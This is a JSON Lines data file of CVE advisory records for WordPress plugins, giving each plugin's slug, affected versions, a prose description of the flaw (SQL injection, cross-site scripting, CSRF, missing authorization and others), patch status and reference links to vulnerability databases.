{"CVE_ID":"CVE-2024-12612","slug":"school-management","versionImpact":"93.2.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to SQL Injection via several parameters across multiple AJAX action in all versions up to, and including, 93.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/258877a7-670c-4a3c-8107-47dc7ba6a5ed?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/258877a7-670c-4a3c-8107-47dc7ba6a5ed?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1028","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the setIgnore function. This makes it possible for unauthenticated attackers to update plugin options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b978749-7ea5-45f4-9f69-66a19c0e39ca\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6b978749-7ea5-45f4-9f69-66a19c0e39ca\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/tags\\\/4.5.4\\\/inc\\\/class.metaseo-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/tags\\\/4.5.4\\\/inc\\\/class.metaseo-admin.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23710","slug":"miniorange-login-openid","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in miniOrange WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin <=\u00a07.5.14 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-login-openid\\\/wordpress-wordpress-social-login-and-register-discord-google-twitter-linkedin-plugin-7-5-14-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36726","slug":"ultimate-reviews","versionImpact":"2.1.32","description":"The Ultimate Reviews plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 2.1.32 via deserialization of untrusted input in several vulnerable functions. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2409141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2409141\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db30acd7-ce51-45d9-8ff0-6ceea8237a8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db30acd7-ce51-45d9-8ff0-6ceea8237a8c?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-reviews-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-ultimate-reviews-plugin-fixed-insecure-deserialization-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2352","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.9.4. This is due to missing or incorrect nonce validation on the chp_abd_action function. This makes it possible for unauthenticated attackers to update or reset plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5a9cced-0e5e-4b6e-8291-0a862c9f9523?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5a9cced-0e5e-4b6e-8291-0a862c9f9523?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24801","slug":"lgx-owl-carousel","versionImpact":"1.4.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt OWL Carousel \u2013 WordPress Owl Carousel Slider allows Stored XSS.This issue affects OWL Carousel \u2013 WordPress Owl Carousel Slider: from n\/a through 1.4.0.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/lgx-owl-carousel\\\/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/lgx-owl-carousel\\\/wordpress-owl-carousel-plugin-1-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1328","slug":"newsletter2go","versionImpact":"4.0.13","description":"The Newsletter2Go plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018style\u2019 parameter in all versions up to, and including, 4.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766ac399-7280-4186-8972-94da813da85e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766ac399-7280-4186-8972-94da813da85e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/tags\\\/4.0.13\\\/gui\\\/N2Go_Gui.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/newsletter2go\\\/tags\\\/4.0.13\\\/gui\\\/N2Go_Gui.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33931","slug":"jw-player-7-for-wp","versionImpact":"2.3.3","description":"Missing Authorization vulnerability in ilGhera JW Player for WordPress.This issue affects JW Player for WordPress: from n\/a through 2.3.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jw-player-7-for-wp\\\/wordpress-jw-player-for-wordpress-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/jw-player-7-for-wp\\\/wordpress-jw-player-for-wordpress-plugin-2-3-3-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4355","slug":"stopbadbots","versionImpact":"10.24","description":"The Block Bad Bots and Stop Bad Bots Crawlers and Spiders and Anti Spam Protection plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the stopbadbots_get_ajax_data() function in all versions up to, and including, 10.24. This makes it possible for authenticated attackers, with subscriber-level access and above, to expose visitor data.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c77d94ae-528d-4525-b16d-96529bee08c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c77d94ae-528d-4525-b16d-96529bee08c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stopbadbots\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stopbadbots\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5856","slug":"comment-images-reloaded","versionImpact":"2.2.1","description":"The Comment Images Reloaded plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the cir_delete_image AJAX action in all versions up to, and including, 2.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary media attachments.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f2dc3e7-1e10-4547-8469-726c6747465d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f2dc3e7-1e10-4547-8469-726c6747465d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comment-images-reloaded\\\/trunk\\\/functions\\\/delete-comment.php#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/comment-images-reloaded\\\/trunk\\\/functions\\\/delete-comment.php#L7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11412","slug":"shine-pdf","versionImpact":"1.0","description":"The Shine PDF Embeder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shinepdf' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shine-pdf\\\/trunk\\\/shine.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shine-pdf\\\/trunk\\\/shine.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455fb4af-47cf-42d5-8232-f00442bca761?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/455fb4af-47cf-42d5-8232-f00442bca761?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11339","slug":"smart-popup-blaster","versionImpact":"1.4.3","description":"The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's\r\n'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-popup-blaster\\\/trunk\\\/admin\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10f391a-6663-4222-8266-ab911c588b76?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e10f391a-6663-4222-8266-ab911c588b76?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13467","slug":"wp-contact-form7-email-spam-blocker","versionImpact":"1.0.0","description":"The WP Contact Form7 Email Spam Blocker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-contact-form7-email-spam-blocker\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-contact-form7-email-spam-blocker\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b70a1344-2b55-40c9-a314-80d581e0b019?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b70a1344-2b55-40c9-a314-80d581e0b019?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4100","slug":"nautic-pages","versionImpact":"2.0","description":"The Nautic Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'np_marinetraffic_map' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nautic-pages\\\/trunk\\\/nautic_pages.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nautic-pages\\\/trunk\\\/nautic_pages.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f6bfe18-bb9b-4cc2-bdb7-fd9163b61323?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f6bfe18-bb9b-4cc2-bdb7-fd9163b61323?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11140","slug":"real-wp-shop-lite","versionImpact":"2.0.8","description":"The Real WP Shop Lite Ajax eCommerce Shopping Cart WordPress plugin through 2.0.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3448dff-a839-45aa-8d5a-d359e50ab7fd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b3448dff-a839-45aa-8d5a-d359e50ab7fd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5939","slug":"telegram-for-wp","versionImpact":"1.6.1","description":"The Telegram for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/telegram-for-wp\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/telegram-for-wp\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf4a3171-f041-40ce-8148-239c24d7ce95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf4a3171-f041-40ce-8148-239c24d7ce95?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7359","slug":"counter-visitor-for-woocommerce","versionImpact":"1.3.6","description":"The Counter live visitors for WooCommerce plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the wcvisitor_get_block function in all versions up to, and including, 1.3.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. NOTE: This particular vulnerability deletes all the files in a targeted arbitrary directory rather than a specified arbitrary file, which can lead to loss of data or a denial of service condition.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-visitor-for-woocommerce\\\/tags\\\/1.3.6\\\/woo-counter-visitor.php#L378\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/counter-visitor-for-woocommerce\\\/tags\\\/1.3.6\\\/woo-counter-visitor.php#L378\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae13dc61-c4bf-4b17-8055-98c80a853a2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae13dc61-c4bf-4b17-8055-98c80a853a2a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4383","slug":"cbxpetition","versionImpact":"1.0.3","description":"The CBX Petition for WordPress plugin through 1.0.3 does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0fe5a53-8ae2-4b67-ac6e-4a8860e39035\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e0fe5a53-8ae2-4b67-ac6e-4a8860e39035\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1027","slug":"wp-meta-seo","versionImpact":"4.5.3","description":"The WP Meta SEO plugin for WordPress is vulnerable to unauthorized sitemap generation due to a missing capability check on the checkAllCategoryInSitemap function in versions up to, and including, 4.5.3. This makes it possible for authenticated attackers with subscriber-level access to obtain post categories. This vulnerability occurred as a result of the plugin relying on nonce checks as a means of access control, and that nonce being accessible to all authenticated users regardless of role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2870465\\\/wp-meta-seo\\\/trunk?contextall=1&old=2869205&old_path=%2Fwp-meta-seo%2Ftrunk#file2\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2870465%40wp-meta-seo&new=2870465%40wp-meta-seo&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f589e21-7417-4b43-b580-4f1d3c2041f4\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f589e21-7417-4b43-b580-4f1d3c2041f4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2279","slug":"wpdirectorykit","versionImpact":"1.2.1","description":"The WP Directory Kit plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.1. This is due to missing or incorrect nonce validation on the 'admin_page_display' function. This makes it possible for unauthenticated attackers to delete or change plugin settings, import demo data, modify or delete Directory Kit related posts and terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Partial patches were made avilable in versions 1.2.0 and 1.2.1 but the issue was not fully patched until 1.2.2","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905795%40wpdirectorykit%2Ftrunk&old=2905046%40wpdirectorykit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2905795%40wpdirectorykit%2Ftrunk&old=2905046%40wpdirectorykit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/admin\\\/class-wpdirectorykit-admin.php#L170\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpdirectorykit\\\/tags\\\/1.1.8\\\/admin\\\/class-wpdirectorykit-admin.php#L170\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a7a6da3-d67c-42b3-8826-7e7fc9b938b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a7a6da3-d67c-42b3-8826-7e7fc9b938b4?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46086","slug":"affiliate-toolkit-starter","versionImpact":"3.4.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SERVIT Software Solutions affiliate-toolkit \u2013 WordPress Affiliate Plugin allows Reflected XSS.This issue affects affiliate-toolkit \u2013 WordPress Affiliate Plugin: from n\/a through 3.4.3.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-plugin-3-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/affiliate-toolkit-starter\\\/wordpress-affiliate-toolkit-plugin-3-4-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-24713","slug":"auto-listings","versionImpact":"2.6.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Auto Listings Auto Listings \u2013 Car Listings & Car Dealership Plugin for WordPress allows Stored XSS.This issue affects Auto Listings \u2013 Car Listings & Car Dealership Plugin for WordPress: from n\/a through 2.6.5.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/auto-listings\\\/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/auto-listings\\\/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0906","slug":"fx-private-site","versionImpact":"1.2.1","description":"The f(x) Private Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.2.1 via the API. This makes it possible for unauthenticated attackers to obtain page and post contents of a site protected with this plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79c3abc6-68fa-4c51-88fa-03ab7d26cc4c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fx-private-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fx-private-site\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33941","slug":"ipanorama-360-virtual-tour-builder-lite","versionImpact":"1.8.1","description":"Missing Authorization vulnerability in Avirtum iPanorama 360 WordPress Virtual Tour Builder.This issue affects iPanorama 360 WordPress Virtual Tour Builder: from n\/a through 1.8.1.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipanorama-360-virtual-tour-builder-lite\\\/wordpress-ipanorama-360-plugin-1-8-1-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2657","slug":"font-farsi","versionImpact":"1.6.6","description":"The Font Farsi plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.6.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec6faa4-d8d3-4c5e-91b2-142164d3b481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ec6faa4-d8d3-4c5e-91b2-142164d3b481?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/font-farsi\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/font-farsi\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4271","slug":"svgator","versionImpact":"1.2.6","description":"The SVGator  WordPress plugin through 1.2.6 does not sanitize SVG file contents, which enables users with at least the author role to SVG with malicious JavaScript to conduct Stored XSS attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1fe0bc7-a340-428e-a549-1e37291bea1c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1fe0bc7-a340-428e-a549-1e37291bea1c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
